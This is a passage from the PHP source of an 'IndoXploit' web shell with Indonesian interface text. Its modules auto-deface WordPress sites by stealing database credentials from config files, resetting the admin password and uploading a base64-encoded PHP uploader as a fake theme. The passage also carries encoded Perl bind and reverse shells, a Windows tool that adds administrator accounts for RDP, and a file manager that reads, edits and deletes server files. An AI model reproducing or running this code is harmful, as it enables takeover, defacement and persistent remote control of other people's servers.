  1424. $dbuser = ambilkata($config,"DB_USER', '","'");
  1425. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1426. $dbname = ambilkata($config,"DB_NAME', '","'");
  1427. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1428. $prefix = $dbprefix."users";
  1429. $option = $dbprefix."options";
  1430. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1431. $db = mysql_select_db($dbname);
  1432. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1433. $result = mysql_fetch_array($q);
  1434. $id = $result[ID];
  1435. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1436. $result2 = mysql_fetch_array($q2);
  1437. $target = $result2[option_value];
  1438. if($target == '') {
  1439. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1440. } else {
  1441. echo "[+] $target <br>";
  1442. }
  1443. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1444. if(!$conn OR !$db OR !$update) {
  1445. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1446. mysql_close($conn);
  1447. } else {
  1448. $site = "$target/wp-login.php";
  1449. $site2 = "$target/wp-admin/theme-install.php?upload";
  1450. $b1 = anucurl($site2);
  1451. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1452. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1453. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1454. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1455. $www = "m.php";
  1456. $fp5 = fopen($www,"w");
  1457. fputs($fp5,$upload3);
  1458. $post2 = array(
  1459. "_wpnonce" => "$anu2",
  1460. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1461. "themezip" => "@$www",
  1462. "install-theme-submit" => "Install Now",
  1463. );
  1464. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1465. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1466. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1467. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1468. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1469. curl_setopt($ch, CURLOPT_POST, 1);
  1470. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1471. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1472. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1473. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1474. $data3 = curl_exec($ch);
  1475. curl_close($ch);
  1476. $y = date("Y");
  1477. $m = date("m");
  1478. $namafile = "id.php";
  1479. $fpi = fopen($namafile,"w");
  1480. fputs($fpi,$script);
  1481. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1482. curl_setopt($ch6, CURLOPT_POST, true);
  1483. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1484. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1485. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1486. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1487. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1488. $postResult = curl_exec($ch6);
  1489. curl_close($ch6);
  1490. $as = "$target/k.php";
  1491. $bs = anucurl($as);
  1492. if(preg_match("#$script#is", $bs)) {
  1493. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1494. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1495. } else {
  1496. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1497. echo "[!!] coba aja manual: <br>";
  1498. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1499. echo "[+] username: <font color=lime>$user</font><br>";
  1500. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1501. }
  1502. mysql_close($conn);
  1503. }
  1504. }
  1505. }
  1506. } else {
  1507. echo "<center><h1>WordPress Auto Deface</h1>
  1508. <form method='post'>
  1509. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1510. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1511. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1512. </form>
  1513. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1514. </center>";
  1515. }
  1516. } elseif($_GET['do'] == 'auto_dwp2') {
  1517. if($_POST['auto_deface_wp']) {
  1518. function anucurl($sites) {
  1519. $ch = curl_init($sites);
  1520. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1521. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1522. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1523. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1524. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1525. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1526. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1527. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1528. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1529. $data = curl_exec($ch);
  1530. curl_close($ch);
  1531. return $data;
  1532. }
  1533. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1534. $post = array(
  1535. "log" => "$userr",
  1536. "pwd" => "$pass",
  1537. "rememberme" => "forever",
  1538. "wp-submit" => "$wp_submit",
  1539. "redirect_to" => "$web",
  1540. "testcookie" => "1",
  1541. );
  1542. $ch = curl_init($cek);
  1543. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1544. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1545. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1546. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1547. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1548. curl_setopt($ch, CURLOPT_POST, 1);
  1549. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1550. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1551. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1552. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1553. $data = curl_exec($ch);
  1554. curl_close($ch);
  1555. return $data;
  1556. }
  1557. $link = explode("\r\n", $_POST['link']);
  1558. $script = htmlspecialchars($_POST['script']);
  1559. $user = "indoxploit";
  1560. $pass = "indoxploit";
  1561. $passx = md5($pass);
  1562. foreach($link as $dir_config) {
  1563. $config = anucurl($dir_config);
  1564. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1565. $dbuser = ambilkata($config,"DB_USER', '","'");
  1566. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1567. $dbname = ambilkata($config,"DB_NAME', '","'");
  1568. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1569. $prefix = $dbprefix."users";
  1570. $option = $dbprefix."options";
  1571. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1572. $db = mysql_select_db($dbname);
  1573. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1574. $result = mysql_fetch_array($q);
  1575. $id = $result[ID];
  1576. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1577. $result2 = mysql_fetch_array($q2);
  1578. $target = $result2[option_value];
  1579. if($target == '') {
  1580. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1581. } else {
  1582. echo "[+] $target <br>";
  1583. }
  1584. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1585. if(!$conn OR !$db OR !$update) {
  1586. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1587. mysql_close($conn);
  1588. } else {
  1589. $site = "$target/wp-login.php";
  1590. $site2 = "$target/wp-admin/theme-install.php?upload";
  1591. $b1 = anucurl($site2);
  1592. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1593. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1594. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1595. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1596. $www = "m.php";
  1597. $fp5 = fopen($www,"w");
  1598. fputs($fp5,$upload3);
  1599. $post2 = array(
  1600. "_wpnonce" => "$anu2",
  1601. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1602. "themezip" => "@$www",
  1603. "install-theme-submit" => "Install Now",
  1604. );
  1605. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1606. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1607. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1608. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1609. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1610. curl_setopt($ch, CURLOPT_POST, 1);
  1611. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1612. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1613. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1614. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1615. $data3 = curl_exec($ch);
  1616. curl_close($ch);
  1617. $y = date("Y");
  1618. $m = date("m");
  1619. $namafile = "id.php";
  1620. $fpi = fopen($namafile,"w");
  1621. fputs($fpi,$script);
  1622. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1623. curl_setopt($ch6, CURLOPT_POST, true);
  1624. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1625. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1626. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1627. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1628. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1629. $postResult = curl_exec($ch6);
  1630. curl_close($ch6);
  1631. $as = "$target/k.php";
  1632. $bs = anucurl($as);
  1633. if(preg_match("#$script#is", $bs)) {
  1634. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1635. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1636. } else {
  1637. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1638. echo "[!!] coba aja manual: <br>";
  1639. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1640. echo "[+] username: <font color=lime>$user</font><br>";
  1641. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1642. }
  1643. mysql_close($conn);
  1644. }
  1645. }
  1646. } else {
  1647. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1648. <form method='post'>
  1649. Link Config: <br>
  1650. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1651. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1652. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1653. </form></center>";
  1654. }
  1655. } elseif($_GET['do'] == 'network') {
  1656. echo "<form method='post'>
  1657. <u>Bind Port:</u> <br>
  1658. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1659. <input type='submit' name='sub_bp' value='>>'>
  1660. </form>
  1661. <form method='post'>
  1662. <u>Back Connect:</u> <br>
  1663. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1664. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1665. <input type='submit' name='sub_bc' value='>>'>
  1666. </form>";
  1667. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1668. if(isset($_POST['sub_bp'])) {
  1669. $f_bp = fopen("/tmp/bp.pl", "w");
  1670. fwrite($f_bp, base64_decode($bind_port_p));
  1671. fclose($f_bp);
  1672.  
  1673. $port = $_POST['port_bind'];
  1674. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1675. sleep(1);
  1676. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1677. unlink("/tmp/bp.pl");
  1678. }
  1679. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1680. if(isset($_POST['sub_bc'])) {
  1681. $f_bc = fopen("/tmp/bc.pl", "w");
  1682. fwrite($f_bc, base64_decode($bind_connect_p));
  1683. fclose($f_bc);
  1684.  
  1685. $ipbc = $_POST['ip_bc'];
  1686. $port = $_POST['port_bc'];
  1687. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1688. sleep(1);
  1689. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1690. unlink("/tmp/bc.pl");
  1691. }
  1692. } elseif($_GET['do'] == 'krdp_shell') {
  1693. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1694. if($_POST['create']) {
  1695. $user = htmlspecialchars($_POST['user']);
  1696. $pass = htmlspecialchars($_POST['pass']);
  1697. if(preg_match("/$user/", exe("net user"))) {
  1698. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1699. } else {
  1700. $add_user = exe("net user $user $pass /add");
  1701. $add_groups1 = exe("net localgroup Administrators $user /add");
  1702. $add_groups2 = exe("net localgroup Administrator $user /add");
  1703. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1704. echo "[ RDP ACCOUNT INFO ]<br>
  1705. ------------------------------<br>
  1706. IP: <font color=lime>".$ip."</font><br>
  1707. Username: <font color=lime>$user</font><br>
  1708. Password: <font color=lime>$pass</font><br>
  1709. ------------------------------<br><br>
  1710. [ STATUS ]<br>
  1711. ------------------------------<br>
  1712. ";
  1713. if($add_user) {
  1714. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1715. } else {
  1716. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1717. }
  1718. if($add_groups1) {
  1719. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1720. } elseif($add_groups2) {
  1721. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1722. } elseif($add_groups3) {
  1723. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1724. } else {
  1725. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1726. }
  1727. echo "------------------------------<br>";
  1728. }
  1729. } elseif($_POST['s_opsi']) {
  1730. $user = htmlspecialchars($_POST['r_user']);
  1731. if($_POST['opsi'] == '1') {
  1732. $cek = exe("net user $user");
  1733. echo "Checking username <font color=lime>$user</font> ....... ";
  1734. if(preg_match("/$user/", $cek)) {
  1735. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1736. ------------------------------<br><br>
  1737. <pre>$cek</pre>";
  1738. } else {
  1739. echo "[ <font color=red>belum ada</font> ]";
  1740. }
  1741. } elseif($_POST['opsi'] == '2') {
  1742. $cek = exe("net user $user indoxploit");
  1743. if(preg_match("/$user/", exe("net user"))) {
  1744. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1745. if($cek) {
  1746. echo "<font color=lime>Berhasil</font>";
  1747. } else {
  1748. echo "<font color=red>Gagal</font>";
  1749. }
  1750. } else {
  1751. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1752. }
  1753. } elseif($_POST['opsi'] == '3') {
  1754. $cek = exe("net user $user /DELETE");
  1755. if(preg_match("/$user/", exe("net user"))) {
  1756. echo "[remove user: <font color=lime>$user</font>] -> ";
  1757. if($cek) {
  1758. echo "<font color=lime>Berhasil</font>";
  1759. } else {
  1760. echo "<font color=red>Gagal</font>";
  1761. }
  1762. } else {
  1763. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1764. }
  1765. } else {
  1766. //
  1767. }
  1768. } else {
  1769. echo "-- Create RDP --<br>
  1770. <form method='post'>
  1771. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1772. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1773. <input type='submit' name='create' value='>>'>
  1774. </form>
  1775. -- Option --<br>
  1776. <form method='post'>
  1777. <input type='text' name='r_user' placeholder='username' required>
  1778. <select name='opsi'>
  1779. <option value='1'>Cek Username</option>
  1780. <option value='2'>Ubah Password</option>
  1781. <option value='3'>Hapus Username</option>
  1782. </select>
  1783. <input type='submit' name='s_opsi' value='>>'>
  1784. </form>
  1785. ";
  1786. }
  1787. } else {
  1788. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1789. }
  1790. } elseif($_GET['act'] == 'newfile') {
  1791. if($_POST['new_save_file']) {
  1792. $newfile = htmlspecialchars($_POST['newfile']);
  1793. $fopen = fopen($newfile, "a+");
  1794. if($fopen) {
  1795. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1796. } else {
  1797. $act = "<font color=red>permission denied</font>";
  1798. }
  1799. }
  1800. echo $act;
  1801. echo "<form method='post'>
  1802. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1803. <input type='submit' name='new_save_file' value='Submit'>
  1804. </form>";
  1805. } elseif($_GET['act'] == 'newfolder') {
  1806. if($_POST['new_save_folder']) {
  1807. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1808. if(!mkdir($new_folder)) {
  1809. $act = "<font color=red>permission denied</font>";
  1810. } else {
  1811. $act = "<script>window.location='?dir=".$dir."';</script>";
  1812. }
  1813. }
  1814. echo $act;
  1815. echo "<form method='post'>
  1816. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1817. <input type='submit' name='new_save_folder' value='Submit'>
  1818. </form>";
  1819. } elseif($_GET['act'] == 'rename_dir') {
  1820. if($_POST['dir_rename']) {
  1821. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1822. if($dir_rename) {
  1823. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1824. } else {
  1825. $act = "<font color=red>permission denied</font>";
  1826. }
  1827. echo "".$act."<br>";
  1828. }
  1829. echo "<form method='post'>
  1830. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1831. <input type='submit' name='dir_rename' value='rename'>
  1832. </form>";
  1833. } elseif($_GET['act'] == 'delete_dir') {
  1834. if(is_dir($dir)) {
  1835. if(is_writable($dir)) {
  1836. @rmdir($dir);
  1837. @exe("rm -rf $dir");
  1838. @exe("rmdir /s /q $dir");
  1839. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1840. } else {
  1841. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1842. }
  1843. }
  1844. echo $act;
  1845. } elseif($_GET['act'] == 'view') {
  1846. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1847. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1848. } elseif($_GET['act'] == 'edit') {
  1849. if($_POST['save']) {
  1850. $save = file_put_contents($_GET['file'], $_POST['src']);
  1851. if($save) {
  1852. $act = "<font color=lime>Saved!</font>";
  1853. } else {
  1854. $act = "<font color=red>permission denied</font>";
  1855. }
  1856. echo "".$act."<br>";
  1857. }
  1858. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1859. echo "<form method='post'>
  1860. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1861. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1862. </form>";
  1863. } elseif($_GET['act'] == 'rename') {
  1864. if($_POST['do_rename']) {
  1865. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1866. if($rename) {
  1867. $act = "<script>window.location='?dir=".$dir."';</script>";
  1868. } else {
  1869. $act = "<font color=red>permission denied</font>";
  1870. }
  1871. echo "".$act."<br>";
  1872. }
  1873. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1874. echo "<form method='post'>
  1875. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1876. <input type='submit' name='do_rename' value='rename'>
  1877. </form>";
  1878. } elseif($_GET['act'] == 'delete') {
  1879. $delete = unlink($_GET['file']);
  1880. if($delete) {
  1881. $act = "<script>window.location='?dir=".$dir."';</script>";
  1882. } else {
  1883. $act = "<font color=red>permission denied</font>";
  1884. }
  1885. echo $act;
  1886. } else {
  1887. if(is_dir($dir) === true) {
  1888. if(!is_readable($dir)) {
  1889. echo "<font color=red>can't open directory. ( not readable )</font>";
  1890. } else {
  1891. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1892. <tr>
  1893. <th class="th_home"><center>Name</center></th>
  1894. <th class="th_home"><center>Type</center></th>
  1895. <th class="th_home"><center>Size</center></th>
  1896. <th class="th_home"><center>Last Modified</center></th>
  1897. <th class="th_home"><center>Owner/Group</center></th>
  1898. <th class="th_home"><center>Permission</center></th>
  1899. <th class="th_home"><center>Action</center></th>
  1900. </tr>';
  1901. $scandir = scandir($dir);
  1902. foreach($scandir as $dirx) {
  1903. $dtype = filetype("$dir/$dirx");
  1904. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1905. if(function_exists('posix_getpwuid')) {
  1906. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1907. $downer = $downer['name'];
  1908. } else {
  1909. //$downer = $uid;
  1910. $downer = fileowner("$dir/$dirx");
  1911. }
  1912. if(function_exists('posix_getgrgid')) {
  1913. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1914. $dgrp = $dgrp['name'];
  1915. } else {
  1916. $dgrp = filegroup("$dir/$dirx");
  1917. }
  1918. if(!is_dir("$dir/$dirx")) continue;
  1919. if($dirx === '..') {
  1920. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1921. } elseif($dirx === '.') {
  1922. $href = "<a href='?dir=$dir'>$dirx</a>";
  1923. } else {
  1924. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1925. }
  1926. if($dirx === '.' || $dirx === '..') {
  1927. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1928. } else {
  1929. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1930. }
  1931. echo "<tr>";
  1932. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1933. echo "<td class='td_home'><center>$dtype</center></td>";
  1934. echo "<td class='td_home'><center>-</center></th></td>";
  1935. echo "<td class='td_home'><center>$dtime</center></td>";
  1936. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1937. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1938. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1939. echo "</tr>";
  1940. }
  1941. }
  1942. } else {
  1943. echo "<font color=red>can't open directory.</font>";
  1944. }
  1945. foreach($scandir as $file) {
  1946. $ftype = filetype("$dir/$file");
  1947. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1948. $size = filesize("$dir/$file")/1024;
  1949. $size = round($size,3);
  1950. if(function_exists('posix_getpwuid')) {
  1951. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1952. $fowner = $fowner['name'];
  1953. } else {
  1954. //$downer = $uid;
  1955. $fowner = fileowner("$dir/$file");
  1956. }
  1957. if(function_exists('posix_getgrgid')) {
  1958. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1959. $fgrp = $fgrp['name'];
  1960. } else {
  1961. $fgrp = filegroup("$dir/$file");
  1962. }
  1963. if($size > 1024) {
  1964. $size = round($size/1024,2). 'MB';
  1965. } else {
  1966. $size = $size. 'KB';
  1967. }
  1968. if(!is_file("$dir/$file")) continue;
